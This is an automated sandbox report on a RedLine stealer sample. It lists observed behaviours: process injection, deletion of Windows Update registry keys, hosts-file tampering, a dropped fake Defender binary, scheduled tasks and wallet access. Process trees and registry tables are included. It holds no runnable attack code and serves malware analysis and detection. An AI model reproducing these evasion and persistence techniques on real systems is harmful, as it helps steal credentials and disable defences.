Analysis Overview
SHA256
404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c
Threat Level: Known bad
The file 77d29818be0d01c38545baa0bd4551c6853c224b was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies security service
Suspicious use of NtCreateProcessExOtherParentProcess
RedLine payload
RedLine
Downloads MZ/PE file
Drops file in Drivers directory
Blocklisted process makes network request
Executes dropped EXE
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Enumerates system info in registry
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-16 13:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-16 13:38
Reported
2023-01-16 14:47
Platform
win7-20220812-en
Max time kernel
34s
Max time network
43s
Command Line
Signatures
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2032 set thread context of 1988 | N/A | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe
"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 36
Network
Files
memory/1988-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1988-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1988-62-0x0000000000401159-mapping.dmp
memory/936-63-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-16 13:38
Reported
2023-01-16 14:47
Platform
win10v2004-20220812-en
Max time kernel
155s
Max time network
158s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4992 created 4248 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3932 created 3232 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 260 created 3176 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3748 created 4008 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4100 set thread context of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1312 set thread context of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 2208 set thread context of 4804 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 364 set thread context of 3316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe
"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4100 -ip 4100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 300
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "<encoded command not captured>"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
